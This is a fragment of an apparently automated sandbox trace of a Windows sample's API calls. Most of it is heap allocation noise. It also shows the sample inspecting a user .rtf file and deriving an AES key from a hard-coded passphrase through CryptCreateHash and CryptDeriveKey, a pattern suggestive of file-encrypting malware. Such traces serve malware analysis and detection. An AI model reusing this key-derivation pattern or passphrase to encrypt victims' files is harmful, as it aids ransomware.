dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4e10 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0080.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.700] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cae80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0080.700] CloseHandle (hObject=0x258) returned 1 [0080.700] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.701] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0080.701] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\bbYe6GX.rtf", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0a74e20, ftCreationTime.dwHighDateTime=0x1d5ecc1, ftLastAccessTime.dwLowDateTime=0xa975cc0, ftLastAccessTime.dwHighDateTime=0x1d5e9b2, ftLastWriteTime.dwLowDateTime=0xa975cc0, ftLastWriteTime.dwHighDateTime=0x1d5e9b2, nFileSizeHigh=0x0, nFileSizeLow=0x7f03, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="bbYe6GX.rtf", cAlternateFileName="")) returned 0x41ac740 [0080.701] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0080.701] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.701] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.701] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0080.701] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.701] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0080.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0080.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0080.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0080.702] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a4e98) returned 1 [0080.702] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0080.702] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.703] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0080.703] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.703] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.703] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.703] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.703] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.703] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0080.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb4b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0080.703] CryptCreateHash (in: hProv=0x41a4e98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0080.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0080.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0080.746] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0080.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0080.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0080.747] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0080.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c3758, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0080.747] CryptHashData (hHash=0x41ac600, pbData=0x17e2788, dwDataLen=0x22, dwFlags=0x1) returned 1 [0080.747] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.747] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0080.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c36b0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0080.751] CryptDeriveKey (in: hProv=0x41a4e98, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac780) returned 1 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3920 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0080.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38d8 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3968 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b60 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b30 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b48 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d20 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0080.753] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0080.753] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0080.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0080.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0080.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0080.754] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0080.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0080.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0080.754] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0080.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0080.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0080.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c36f8 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3770 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3680 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3590 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3878 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3698 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3788 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3740 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0080.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0080.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3758 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c35c0 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c36e0 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3620 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c37a0 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c37b8 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c35f0 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0080.755] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0080.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3800 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0080.755] PeekMessageW (in: lpMsg=0x144e1ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1ac) returned 0 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0080.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0080.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0080.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0080.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0080.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0080.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0080.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0080.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0080.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38c0 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0080.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3950 [0080.756] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b18 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0080.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0080.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3968 [0080.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b18 | out: hHeap=0x1780000) returned 1 [0080.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0080.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3968 | out: hHeap=0x1780000) returned 1 [0080.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0080.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0080.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0080.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3968 [0080.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0080.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0080.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b78 [0080.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3968 | out: hHeap=0x1780000) returned 1 [0080.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0080.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b78 | out: hHeap=0x1780000) returned 1 [0080.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0080.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a28 [0080.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0080.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 